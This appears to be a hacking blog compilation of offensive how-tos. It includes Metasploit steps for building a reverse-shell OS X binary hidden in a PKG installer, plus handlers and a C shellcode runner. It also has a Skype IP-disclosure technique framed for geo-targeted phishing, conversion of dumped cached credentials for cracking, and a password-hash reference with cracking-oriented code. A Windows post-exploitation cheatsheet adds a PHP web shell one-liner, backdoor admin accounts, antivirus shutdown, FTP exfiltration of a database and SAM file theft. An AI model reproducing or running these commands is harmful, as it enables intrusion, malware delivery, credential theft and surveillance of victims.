Dec 1, 2012

Howto: Web shell in JSP, ASP, PHP By BruteLogic.



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Hacking OSX using Metasploit

This post is only a summary of the source. For the full write-up and screenshots, see the source link at the end.

1. Generate the OS X reverse-shell payload with Metasploit (msfencode's default output format is a Ruby string literal, which is what step 2 cleans up):
- ./msfpayload   osx/x86/shell_reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/call4_dword_xor  > test.c
2. Strip the Ruby string concatenation (the trailing + on each line), rename the buffer to a C array and wrap it in a main() that jumps to it:
- sed -e 's/+/ /g' test.c > clean.c
- sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
- echo "#include <stdio.h>" >> temp.c
- cat ready.c >> temp.c
- echo ";" >> temp.c
- echo "int main(void) { ((void (*)())micro)();" >> temp.c
- echo "}" >> temp.c
- mv temp.c final.c
- echo "final.c is ready in ShellCode, please compile it using gcc on OSX"
- rm -f clean.c
- rm -f test.c
- rm -f ready.c
- rm -f rand.c
- rm -f temp2
- rm -f temp3
- rm -f temp4

3. Compile it with gcc. Note that final.c calls the array in the data segment directly, so this relies on data pages being executable, which the source reports working on OS X of that era:
- gcc final.c -o OSXBin

4. Generate a Java Meterpreter JAR:
- ./msfpayload   java/meterpreter/reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R  > test.jar

5. Obfuscate the JAR with ProGuard (http://proguard.sourceforge.net/).

6. Build a PKG with Iceberg whose install script (install.sh) launches the binary, similar to this:
#!/bin/sh
/Applications/Utilities/OSXBin &

7. Start a handler for the shell payload (LHOST/LPORT must match the values baked into the payload in step 1):
./msfcli exploit/multi/handler  PAYLOAD=osx/x86/shell_reverse_tcp   LHOST=192.168.168.100 LPORT=80  E

8. Start a handler for the Java payload:
./msfcli exploit/multi/handler  PAYLOAD=java/meterpreter/reverse_tcp   LHOST=192.168.168.100 LPORT=81  E

9. Install the PKG on the target and launch the JAR:
java -jar /Applications/Utilities/obfuscated.jar
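The cleanup of step 2 and the runner of step 3, as an added example in Python rather than the post's sed/echo pipeline (this is not the source's code). It parses the Ruby-format buffer that msfencode prints into raw bytes, so a malformed escape is caught before anything is compiled, and it emits a C file that copies the bytes into an executable anonymous mapping instead of calling the .data array directly, which matters on toolchains that map data pages non-executable. The sample buffer is constructed placeholder bytes, not a payload; the array name micro follows the post, and the mmap/memcpy runner is this example's choice.

```python
import re

# Constructed sample in the shape msfencode prints by default (Ruby format):
# placeholder bytes, not a real payload.
SAMPLE_RUBY_BUF = '''buf =
"\\x31\\xc0\\x50\\x68" +
"\\x2f\\x2f\\x73\\x68" +
"\\xcd\\x80"
'''

_STRING = re.compile(r'"((?:\\x[0-9a-fA-F]{2})*)"')
_HEX = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_ruby_buf(text: str) -> bytes:
    """Turn msfencode's 'buf = "..." + "..."' output into raw shellcode bytes."""
    _, eq, body = text.partition("=")
    strings = _STRING.findall(body) if eq else []
    if not strings:
        raise ValueError("no buf = \"\\xNN...\" literals found in input")
    return bytes(int(h, 16) for s in strings for h in _HEX.findall(s))


def to_c_source(shellcode: bytes, name: str = "micro", width: int = 12) -> str:
    """Emit a C runner for the bytes. Unlike the post's final.c, which calls the
    array in .data directly, this copies it into an RWX anonymous mapping first
    (mmap/memcpy are this example's choice, not the post's)."""
    rows = ['"' + "".join("\\x%02x" % b for b in shellcode[i:i + width]) + '"'
            for i in range(0, len(shellcode), width)]
    array = "\n".join(rows)
    return f"""#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/* {len(shellcode)} bytes of shellcode, from msfencode output */
unsigned char {name}[] =
{array};

int main(void) {{
    size_t len = sizeof({name}) - 1;   /* drop the terminating NUL */
    void *exec = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANON, -1, 0);
    if (exec == MAP_FAILED) {{ perror("mmap"); return 1; }}
    memcpy(exec, {name}, len);
    ((void (*)(void))exec)();
    return 0;
}}
"""


if __name__ == "__main__":
    # pipe real msfencode output through parse_ruby_buf() and redirect to final.c
    print(to_c_source(parse_ruby_buf(SAMPLE_RUBY_BUF)))
```

Compile the result exactly as in step 3; the only difference at runtime is that the jump goes to the mapped copy rather than to the array itself.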
 
 

Source: http://astr0baby.wordpress.com/2012/11/30/hacking-osx-using-metasploit/ 


Nov 29, 2012

Howto: Autosaving malicious payload using Fiddler

For the details, see the source link below.

In Fiddler, edit CustomRules.js (Rules > Customize Rules...) and add this handler to the Handlers class:

// Runs once when Fiddler exits.
static function onShutdown() {
        // select every captured session, then walk the selection
        Fiddler.Application.UI.actSelectAll();
        var oSessions = Fiddler.Application.UI.GetSelectedSessions();
        for (var x = 0; x < oSessions.Length; x++)
        {
                 // sessions without a response (aborted, still in flight) have no oResponse
                 if (oSessions[x].oResponse != null &&
                     oSessions[x].oResponse.headers.ExistsAndContains("Content-Type", "application/java-archive"))
                 {
                           oSessions[x].SaveResponseBody();
                 }
        }
}


Now, when you close Fiddler, every captured response whose Content-Type is application/java-archive is saved automatically. Payloads served under a generic type such as application/octet-stream are not matched by this header check.
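The same selection done offline over a saved capture, as an added example in Python (not code from the post or from Fiddler). It assumes Fiddler's SAZ layout, a zip archive holding each raw server response in raw/NN_s.txt, and builds a small constructed archive inline rather than reading a real capture. It also looks at the first bytes of each body, so a JAR or PE served as application/octet-stream is caught even though the Content-Type test alone would miss it.

```python
import io
import zipfile

MAGICS = (b"PK\x03\x04", b"MZ")  # zip/JAR and PE file headers


def _http_response(content_type: str, body: bytes) -> bytes:
    return (b"HTTP/1.1 200 OK\r\nContent-Type: " + content_type.encode() +
            b"\r\nContent-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)


def build_sample_saz() -> bytes:
    """Constructed stand-in for a Fiddler .saz: a zip whose raw/NN_s.txt entries hold
    the raw server responses (the layout assumed here); not a real capture."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("raw/01_s.txt", _http_response("text/html", b"<html>hi</html>"))
        z.writestr("raw/02_s.txt", _http_response("application/java-archive", b"PK\x03\x04fake-jar"))
        # a JAR served under a generic type: the Content-Type check alone misses it
        z.writestr("raw/03_s.txt", _http_response("application/octet-stream", b"PK\x03\x04renamed-jar"))
        z.writestr("raw/04_s.txt", _http_response("application/octet-stream", b"MZ\x90\x00fake-pe"))
    return buf.getvalue()


def extract_payloads(saz: bytes, content_types=("application/java-archive",), use_magic=True) -> dict:
    """Map entry name -> response body for responses selected by Content-Type (what
    the CustomRules.js handler does) or, when use_magic is set, by the body's first bytes."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(saz)) as z:
        for name in z.namelist():
            if not (name.startswith("raw/") and name.endswith("_s.txt")):
                continue
            head, sep, body = z.read(name).partition(b"\r\n\r\n")
            if not sep:
                continue  # no header/body boundary: not a complete response
            ctype = ""
            for line in head.split(b"\r\n")[1:]:
                k, _, v = line.partition(b":")
                if k.strip().lower() == b"content-type":
                    ctype = v.strip().decode(errors="replace").lower()
            by_header = any(ctype.startswith(ct) for ct in content_types)
            by_magic = use_magic and any(body.startswith(m) for m in MAGICS)
            if by_header or by_magic:
                found[name] = body
    return found


if __name__ == "__main__":
    for entry, data in extract_payloads(build_sample_saz()).items():
        print(entry, len(data), "bytes", data[:4])
```

With use_magic=False the function reproduces the FiddlerScript behaviour (only raw/02_s.txt is selected); with the default it also picks up the two responses that lied about their type.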

Source: http://jeromesecurityblog.wordpress.com/2012/11/28/saving-malicious-payload-using-fiddler/  



Nov 27, 2012

Types Of Hash(MD5)

DES(Unix)
Example: IvS7aeT4NzQPM
Used in Linux and other similar OS.
Length: 13 characters.
Description: The first two characters are the salt (random characters; in our example the salt is the string "Iv"), then there follows the actual hash.
Notes: [1] [2]

Domain Cached Credentials
Example: Admin:b474d48cdfc4974d86ef4d24904cdd91
Used for caching passwords of Windows domain.
Length: 16 bytes.
Algorithm: MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))
Note: [1]

MD5(Unix)
Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
Used in Linux and other similar OS.
Length: 34 characters.
Description: The hash begins with the $1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: md5crypt. The password, salt and running digest are fed through a loop of 1000 MD5 calls (not 2000), and the result is encoded with the crypt(3) base64 alphabet ./0-9A-Za-z.
Notes: [1] [2]

MD5(APR)
Example: $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.
Used in Linux and other similar OS.
Length: 37 characters.
Description: The hash begins with the $apr1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: the same md5crypt loop of 1000 MD5 calls as MD5(Unix), only with the $apr1$ magic string mixed in instead of $1$.
Notes: [1] [2]

MD5(phpBB3)
Example: $H$9123456785DAERgALpsri.D9z3ht120
Used in phpBB 3.x.x.
Length: 34 characters.
Description: The hash begins with the $H$ signature, then one character encoding the iteration count as an index into the alphabet ./0-9A-Za-z (most often '9', which is index 11, i.e. 2^11 rounds), then the salt (8 random characters; in our example the salt is the string "12345678"), followed by the actual hash.
Algorithm: phpass. md5($salt.$pass) followed by a loop calling the MD5 algorithm 2048 times (2^11, as encoded by the '9').
Notes: [1] [2]

MD5(Wordpress)
Example: $P$B123456780BhGFYSlUqGyE6ErKErL01
Used in Wordpress.
Length: 34 characters.
Description: The hash begins with the $P$ signature, then one character encoding the iteration count as an index into the alphabet ./0-9A-Za-z (most often 'B', which is index 13, i.e. 2^13 rounds), then the salt (8 random characters; in our example the salt is the string "12345678"), followed by the actual hash.
Algorithm: phpass. md5($salt.$pass) followed by a loop calling the MD5 algorithm 8192 times (2^13, as encoded by the 'B').
Notes: [1] [2]

MySQL
Example: 606717496665bcba
Used in the old versions of MySQL.
Length: 8 bytes.
Description: The hash consists of two DWORDs, each not exceeding the value of 0x7fffffff.

MySQL5
Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40
Used in the new versions of MySQL.
Length: 20 bytes.
Algorithm: SHA-1(SHA-1($pass))
Note: The hashes are to be loaded into the program (PasswordsPro) without the asterisk that begins each hash.

RAdmin v2.x
Example: 5e32cceaafed5cc80866737dfb212d7f
Used in the application Remote Administrator v2.x.
Length: 16 bytes.
Algorithm: The password is padded with zeros to the length of 100 bytes, then that entire string is hashed with the MD5 algorithm.

MD5
Example: c4ca4238a0b923820dcc509a6f75849b
Used in phpBB v2.x, Joomla version below 1.0.13 and many other forums and CMS.
Length: 16 bytes.
Algorithm: Same as the md5() function in PHP.

md5($pass.$salt)
Example: 6f04f0d75f6870858bae14ac0b6d9f73:1234
Used in WB News, Joomla version 1.0.13 and higher.
Length: 16 bytes.
Note: [1]

md5($salt.$pass)
Example: f190ce9ac8445d249747cab7be43f7d5:12
Used in osCommerce, AEF, Gallery and other CMS.
Length: 16 bytes.
Note: [1]

md5(md5($pass))
Example: 28c8edde3d61a0411511d3b1866f0636
Used in e107, DLE, AVE, Diferior, Koobi and other CMS.
Length: 16 bytes.

md5(md5($pass).$salt)
Example: 6011527690eddca23580955c216b1fd2:wQ6
Used in vBulletin, IceBB.
Length: 16 bytes.
Notes: [1] [3] [4]

md5(md5($salt).md5($pass))
Example: 81f87275dd805aa018df8befe09fe9f8:wH6_S
Used in IPB.
Length: 16 bytes.
Notes: [1] [3]

md5(md5($salt).$pass)
Example: 816a14db44578f516cbaef25bd8d8296:1234
Used in MyBB.
Length: 16 bytes.
Note: [1]

md5($salt.$pass.$salt)
Example: a3bc9e11fddf4fef4deea11e33668eab:1234
Used in TBDev.
Length: 16 bytes.
Note: [1]

md5($salt.md5($salt.$pass))
Example: 1d715e52285e5a6b546e442792652c8a:1234
Used in DLP.
Length: 16 bytes.
Note: [1]

SHA-1
Example: 356a192b7913b04c54574d18c28d46e6395428ab
Used in many forums and CMS.
Length: 20 bytes.
Algorithm: Same as the sha1() function in PHP.

sha1(strtolower($username).$pass)
Example: Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a
Used in SMF.
Length: 20 bytes.
Note: [1]

sha1($salt.sha1($salt.sha1($pass)))
Example: cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234
Used in Woltlab BB.
Length: 20 bytes.
Note: [1]

SHA-256(Unix)
Example: $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqiKSNK1rkTk9zYE1v0
Used in Linux and other similar OS.
Length: 55 characters.
Description: The hash begins with the $5$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the SHA-256 algorithm 5000 times.
Notes: [1] [2]

SHA-512(Unix)
Example: $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEmFNLlq6Ik9X3reMXY3doKEuxrcDohKUx0Oxf44aeTIxGEjssvtT1aKyZHjs
Used in Linux and other similar OS.
Length: 98 characters.
Description: The hash begins with the $6$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the SHA-512 algorithm 5000 times.
Notes: [1] [2]


SHA-1(Django) = sha1($salt.$pass)
Example: sha1$12345678$90fbbcf2b72b5973ae42cd3a19ab4ae8a1bd210b
12345678 is salt (in the hexadecimal format)
90fbbcf2b72b5973ae42cd3a19ab4ae8a1bd210b is SHA-1 hash.

SHA-256(Django) = SHA-256($salt.$pass)
Example: sha256$12345678$154c4c511cbb166a317c247a839e46cac6d9208af5b015e1867a84cd9a56007b
12345678 is salt (in the hexadecimal format)
154c4c511cbb166a317c247a839e46cac6d9208af5b015e1867a84cd9a56007b is SHA-256 hash.

SHA-384(Django) = SHA-384($salt.$pass)
Example: sha384$12345678$c0be393a500c7d42b1bd03a1a0a76302f7f472fc132f11ea6373659d0bd8675d04e12d8016d83001c327f0ab70843dd5
12345678 is salt (in the hexadecimal format)
c0be393a500c7d42b1bd03a1a0a76302f7f472fc132f11ea6373659d0bd8675d04e12d8016d83001c327f0ab70843dd5 is SHA-384 hash.

SHA-1(ManGOS) = sha1(strtoupper($username).':'.$pass)

SHA-1(ManGOS2) = sha1($username.':'.$pass) 
 


-------------------------------------------------
Notes:

[1] Since the hashing requires not only a password but also a salt (or a user name), which is unique for each user, the attack speed for such hashes will decline proportionally to their count (for example, attacking 100 hashes will go 100 times slower than attacking one hash).

[2] The hash is to be loaded to the program in full, to the "Hash" column - the program will automatically extract the salt and other required data from it.

[3] The ':' character can be used as salt; however, since it is used by default for separating hash and salt in PasswordsPro, it is recommended that you use a different character for separating fields; e.g., space.

[4] Salt can contain special characters - single or double quotes, as well as backslash, which are preceded (after obtaining dumps from MySQL databases) by an additional backslash, which is to be removed manually. For example, the salt to be loaded to the program would be a'4 instead of a\'4, as well as the salts a"4 instead of a\"4 and a\4 instead of a\\4.
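The schemes above, as an added example in Python that is not part of the InsidePro list: implementations that turn a (password, salt) pair into the string a dump would contain, a helper that tells which of the 32-hex-digit MD5 variants produced a given hash, and a classifier that applies the list's signature/length rules. The list's example hashes are all of the password "1" (the MySQL, MD5 and SHA-1 examples can be reproduced directly). SHA-crypt and DCC are left out to keep the block short; hashlib and re are the only dependencies.

```python
import hashlib
import re

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(v: int, n: int) -> bytes:
    """crypt(3)-style base64: n characters, least significant 6 bits first."""
    return bytes(ITOA64[(v >> (6 * k)) & 0x3F] for k in range(n))


def md5crypt(password: bytes, salt: bytes, magic: bytes = b"$1$") -> str:
    """MD5(Unix) ($1$) and MD5(APR) ($apr1$): md5crypt, fixed at 1000 rounds."""
    salt = salt[:8]
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    for pl in range(len(password), 0, -16):
        ctx.update(alt[:min(16, pl)])
    i = len(password)
    while i:  # one byte per bit of the length: NUL for a 1 bit, first password byte for 0
        ctx.update(b"\x00" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):
        c = hashlib.md5(password if i & 1 else final)
        if i % 3: c.update(salt)
        if i % 7: c.update(password)
        c.update(final if i & 1 else password)
        final = c.digest()
    groups = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    enc = b"".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in groups)
    return (magic + salt + b"$" + enc + _to64(final[11], 2)).decode()


def phpass(password: bytes, salt: bytes, count_log2: int, prefix: bytes = b"$P$") -> str:
    """Portable phpass: $P$ (WordPress) / $H$ (phpBB3). The character after the prefix
    is the round count as an ITOA64 index: 'B' = 13 -> 2**13 = 8192, '9' = 11 -> 2048."""
    salt = salt[:8]
    h = hashlib.md5(salt + password).digest()
    for _ in range(1 << count_log2):
        h = hashlib.md5(h + password).digest()
    # phpass encode64: 3-byte little-endian groups -> 4 chars, the last byte -> 2 chars
    enc = b"".join(_to64(h[i] | h[i + 1] << 8 | h[i + 2] << 16, 4) for i in range(0, 15, 3))
    return (prefix + ITOA64[count_log2:count_log2 + 1] + salt + enc + _to64(h[15], 2)).decode()


def mysql_old_password(password: str) -> str:
    """Pre-4.1 MySQL PASSWORD(): two 31-bit words printed as 16 hex digits."""
    nr, nr2, add = 1345345333, 0x12345671, 7
    for ch in password:
        if ch in " \t":  # MySQL skips spaces and tabs
            continue
        tmp = ord(ch)
        nr = (nr ^ ((((nr & 63) + add) * tmp) + ((nr << 8) & 0xFFFFFFFF))) & 0xFFFFFFFF
        nr2 = (nr2 + (((nr2 << 8) & 0xFFFFFFFF) ^ nr)) & 0xFFFFFFFF
        add += tmp
    return "%08x%08x" % (nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF)


def mysql5(password: bytes) -> str:
    """MySQL 4.1+ PASSWORD(): '*' + SHA-1(SHA-1(pass)) in upper-case hex."""
    return "*" + hashlib.sha1(hashlib.sha1(password).digest()).hexdigest().upper()


def _md5(b: bytes) -> bytes:
    return hashlib.md5(b).hexdigest().encode()  # PHP md5(): lower-case hex text


MD5_VARIANTS = {  # the 32-hex-digit schemes from the list, composed as PHP does
    "md5($pass)": lambda p, s: _md5(p),
    "md5($pass.$salt)": lambda p, s: _md5(p + s),
    "md5($salt.$pass)": lambda p, s: _md5(s + p),
    "md5(md5($pass))": lambda p, s: _md5(_md5(p)),
    "md5(md5($pass).$salt)": lambda p, s: _md5(_md5(p) + s),
    "md5(md5($salt).md5($pass))": lambda p, s: _md5(_md5(s) + _md5(p)),
    "md5(md5($salt).$pass)": lambda p, s: _md5(_md5(s) + p),
    "md5($salt.$pass.$salt)": lambda p, s: _md5(s + p + s),
    "md5($salt.md5($salt.$pass))": lambda p, s: _md5(s + _md5(s + p)),
}


def match_md5_variants(hash_hex: str, salt: str, password: str) -> list:
    """Variants that map (password, salt) to hash_hex. A bare 32-hex-digit hash does
    not say which scheme made it, so more than one can match."""
    p, s = password.encode(), salt.encode()
    return [n for n, f in MD5_VARIANTS.items() if f(p, s) == hash_hex.lower().encode()]


SIGNATURES = [  # (regex, scheme), tried in order; signature first, then bare length
    (r"\$1\$[^$]{0,8}\$[./0-9A-Za-z]{22}", "MD5(Unix)"),
    (r"\$apr1\$[^$]{0,8}\$[./0-9A-Za-z]{22}", "MD5(APR)"),
    (r"\$H\$[./0-9A-Za-z]{31}", "MD5(phpBB3)"),
    (r"\$P\$[./0-9A-Za-z]{31}", "MD5(Wordpress)"),
    (r"\$5\$[^$]{0,16}\$[./0-9A-Za-z]{43}", "SHA-256(Unix)"),
    (r"\$6\$[^$]{0,16}\$[./0-9A-Za-z]{86}", "SHA-512(Unix)"),
    (r"\*[0-9A-F]{40}", "MySQL5"),
    (r"[0-9a-f]{16}", "MySQL (old)"),
    (r"[0-9a-fA-F]{40}", "SHA-1 (raw or a salted variant)"),
    (r"[0-9a-fA-F]{32}", "16-byte digest: raw MD5, an MD5 variant, DCC or RAdmin"),
    (r"[./0-9A-Za-z]{13}", "DES(Unix)"),
]


def identify(line: str) -> str:
    """Classify a dump line by signature and length; a ':salt' suffix is ignored."""
    h = line.split(":", 1)[0]
    for pat, name in SIGNATURES:
        if re.fullmatch(pat, h):
            return name
    return "unknown"
```

The classifier reproduces the list's own caveat: anything that is just 32 hex digits is ambiguous between raw MD5, every md5(...) composition above, DCC and RAdmin, and only trying the candidates (match_md5_variants) or knowing the application settles it. With an empty salt several variants collapse onto each other, which is why that helper returns a list rather than a single name.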







Source: http://forum.insidepro.com/viewtopic.php?t=8225



Nov 26, 2012

Howto: Inject PHP Shell via SSH Log By Brute Logic




Howto: Skype Passive IP Disclosure Vulnerability By SensePost

For those who haven't heard of it: this vulnerability lets an attacker passively disclose a victim's external and internal IP addresses in a matter of seconds by viewing the victim's VCard through the 'Add Contact' form.
Why is this useful?
1. Verifying the identity and location of the target contact. Great when performing geo-targeted phishing attacks.
2. Checking whether your own Skype account is being used from somewhere else :)
3. Spear-phishing enumeration while pen testing.
4. Plain curiosity.
To get this working, follow these basic steps:
1. Download and install the patched version of Skype 5.5 linked from the source (the patch makes the Skype client write its logs in non-obfuscated form).
2. Save the lines below as Skype_log_patch.reg:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Skype\Phone\UI\General]
"LastLanguage"="en"
"Logging"="SkypeDebug2003"
"Logging2"="on"
3. Once saved, run it to enable the Skype debug log file.
4. Start Skype.
5. Search for any Skype contact and click the 'Add a Skype Contact' button, but do not send the request; instead click on the user to view their VCard.
6. Open the log file (it appears in the same folder as the Skype executable, e.g. debug-20121003-0150) and look for the contact's IP addresses.

Source: http://www.sensepost.com/blog/7698.html



Convert metasploit cachedump files to Hashcat format for cracking By Commandlinefu.com

 cd ~/.msf4/loot && cat *mscache* | cut -d '"' -f 2,4 | sed s/\"/\:/g | tr -cd '\11\12\40-\176' | grep -v Username | cut -d : -f 1,2 | awk -F':' '{print $2,$1}' | sed 's/ /:/g' > final.dcc.hash
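The same conversion as an added example in Python (not the commandlinefu one-liner and not Metasploit code). It assumes what the one-liner assumes about the loot file: quoted CSV with the username in the first column and the hash in the second, plus a "Username" header row; the sample below is constructed, not a real dump. Using a CSV parser keeps a username containing a space intact, which the one-liner's final sed (space to colon) would split.

```python
import csv
import io

# Constructed sample in the shape the one-liner assumes for Metasploit's cachedump
# loot (quoted CSV, username first, hash second, a "Username" header); not a real dump.
SAMPLE_LOOT = '''"Username","Hash"
"Admin","b474d48cdfc4974d86ef4d24904cdd91"
"svc backup","0123456789ABCDEF0123456789abcdef"
"garbage line with no hash"
'''

HEX = set("0123456789abcdef")


def mscache_to_hashcat(loot_text: str) -> list:
    """Return 'hash:username' lines for hashcat's DCC mode. A real CSV parser keeps
    usernames containing spaces intact, which the one-liner's final sed breaks."""
    out = []
    for row in csv.reader(io.StringIO(loot_text)):
        if len(row) < 2 or row[0] == "Username":
            continue  # header row or junk line (the grep -v / tr -cd in the one-liner)
        user, h = row[0].strip(), row[1].strip().lower()
        if len(h) != 32 or set(h) - HEX:
            continue  # not a 16-byte digest
        # DCC hashes strtolower(username) as the salt, so emit it lower-cased
        out.append(f"{h}:{user.lower()}")
    return out


if __name__ == "__main__":
    print("\n".join(mscache_to_hashcat(SAMPLE_LOOT)))
```

Feed the output to hashcat with the DCC mode selected, the same way the one-liner's final.dcc.hash is used.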

Source: http://www.commandlinefu.com/commands/view/11574/convert-metasploit-cachedump-files-to-hashcat-format-for-cracking



Howto: Manual Pentest Windows Cheatsheet by Stormsecurity

View your current user: whoami
View information about the current user: net user myuser (for a local user)
net user myuser /domain (for a domain user)
View the local groups: net localgroup
View the local administrators: net localgroup Administrators
Add a new user: net user myuser mypass /add
Add a user in the local Administrators group: net localgroup Administrators myuser /add
View the domain name of current machine: net config workstation
net config server
View the name of the domain controller: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History" /v DCName
View the list of domain admins: net group "Domain Admins" /domain
View the list of started services (search for antivirus): net start
sc query
Stop a service: net stop "Symantec Endpoint Protection"
View the list of started processes and the owner: tasklist /v
Kill a process by its name taskkill /F /IM "cmd.exe"
Abort a shutdown/restart countdown shutdown /a
Create php backdoor/shell echo ^<?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\s.php
Download an executable from a remote FTP server echo open 10.1.2.3> C:\script.txt
echo user myftpuser>> C:\script.txt
echo pass myftppass>> C:\script.txt
echo get nc.exe>> C:\script.txt
echo bye>> C:\script.txt
ftp -s:script.txt
Upload a file to a remote FTP server echo open 10.1.2.3> C:\script.txt
echo user myftpuser>> C:\script.txt
echo pass myftppass>> C:\script.txt
echo put E:\backups\database.dbf>> C:\script.txt
echo bye>> C:\script.txt
ftp -s:script.txt
View established connections of current machine: netstat -a -n -p tcp | find "ESTAB"
View open ports of current machine: netstat -a -n -p tcp | find "LISTEN"
netstat -a -n -p udp
View network configuration: netsh interface ip show addresses
netsh interface ip show route
netsh interface ip show neighbors
View current network shares: net share
Mount a remote share with the rights of the current user: net use K: \\10.1.2.3\C$
dir K:
Enable Remote Desktop: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Update: Post Exploitation

Blind Files

Things to pull when all you can do is blindly read files (LFI / directory traversal): files that have the same name across networks, Windows domains and systems.
File
Expected Contents / Description
%SYSTEMDRIVE%\boot.ini
A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening.
%WINDIR%\win.ini
This is another file to look for if boot.ini isn’t there or coming back, which is some times the case.
%SYSTEMROOT%\repair\SAM

%SYSTEMROOT%\System32\config\RegBack\SAM
Stores users' password hashes (LM hash and NTLM hash). The live SAM is locked while Windows runs, but it can be retrieved using forensic or Volume Shadow Copy methods.
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system

See the Files To Pull section below for more ideas.


System

Command
Expected Output or Description
whoami
Lists your current user. Not shipped with every older Windows version, but present on Windows NT 6.0-6.1 (Vista / 7).
whoami /all
Lists current user, sid, groups current user is a member of and their sids as well as current privilege level.
set
Shows all current environmental variables. Specific ones to look for are USERDOMAIN, USERNAME, USERPROFILE, HOMEPATH, LOGONSERVER, COMPUTERNAME, APPDATA, and ALLUSERPROFILE.
fsutil fsinfo drives
Must be an administrator to run this, but it lists the current drives on the system.
reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """"
Insecurely registered executables within the system registry on Windows 7: values holding an unquoted path with a space in it, which is what the "C:\* *.exe" pattern selects and the find /V """" (drop lines containing a quote) keeps.


Networking (ipconfig, netstat, net)

Command
Expected Output or Description
ipconfig /all
Displays the full information about your NIC’s.
ipconfig /displaydns
Displays your local DNS cache.
netstat -nabo

netstat -s -p [tcp|udp|icpm|ip]

netstat -r

netstat -na | findstr :445

netstat -nao | findstr LISTENING
XP and up; the -o flag adds the owning PID to each line
netstat -na | findstr LISTENING


netsh diag show all

net view
Queries NBNS/SMB (SAMBA) and tries to find all hosts in your current workgroup.
net view /domain

net view /domain:otherdomain

net user %USERNAME% /domain
Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership
net user /domain
Lists all of the domain users
net accounts
Prints the password policy for the local system. This can differ from, and be superseded by, the domain policy.
net accounts /domain
Prints the password policy for the domain
net localgroup administrators
Prints the members of the Administrators local group
net localgroup administrators /domain
Despite the 'localgroup' wording, with /domain this queries the domain's Administrators group, which is another way of getting the *current* domain admins.
net group “Domain Admins” /domain
Prints the members of the Domain Admins group
net group “Enterprise Admins” /domain
Prints the members of the Enterprise Admins group
net group “Domain Controllers” /domain
Prints the list of Domain Controllers for the current domain
nbtstat -a [ip here]

net share
Displays your currently shared SMB entries, and what path(s) they point to
net session | find "\\"
Lists the SMB sessions currently open to this machine (client lines start with \\)

arp -a
Lists all the systems currently in the machine’s ARP table.
route print
Prints the machine’s routing table. This can be good for finding other networks and static routes that have been put in place
browstat (Not working on XP)


netsh wlan show profiles
shows all saved wireless profiles. You may then export the info for those profiles with the command below
netsh wlan export profile folder=. key=clear
exports a user wifi profile with the password in plaintext to an xml file in the current working directory
netsh wlan [start|stop] hostednetwork
Starts or stops a wireless backdoor on a windows 7 pc
netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent|temporary
Complete hosted network setup for creating a wireless backdoor on win 7
netsh wlan set hostednetwork mode=[allow|disallow]
enables or disables hosted network service
wmic ntdomain list
Retrieve information about the domain and the domain controller



  
See also: http://www.securityaegis.com/ntsd-backdoor/

Configs

Command
Expected Output or Description
gpresult /z
Extremely verbose output of GPO (Group policy) settings as applied to the current system and user
sc qc

sc query

sc queryex

type %WINDIR%\System32\drivers\etc\hosts
Print the contents of the Windows hosts file
dir "%ProgramFiles%"
Prints a directory listing of the Program Files directory.
echo %COMSPEC%
Usually going to be cmd.exe in the Windows directory, but it’s good to know for sure.

c:\windows\system32\gathernetworkinfo.vbs
Script included with Windows 7; enumerates the registry, firewall configuration, DNS cache, etc.

Finding Important Files

Command
Description / Reason
tree C:\ /f /a > C:\output_of_tree.txt
Prints a directory listing in ‘tree’ format. The /a makes the tree printed with ASCII characters instead of special ones and the /f displays file names as well as folders
dir /a

dir /b /s [Directory or Filename]

dir \ /s /b | find /I “searchstring”
Searches the output of dir from the root of the current drive (\) and all subdirectories (/s), in bare format (/b) so that each line is a full path, for 'searchstring' anywhere in the file name or path.
command | find /c /v “”
Counts the lines of whatever you use for ‘command’


Files To Pull (if possible)

File location
Description / Reason
%SYSTEMDRIVE%\pagefile.sys
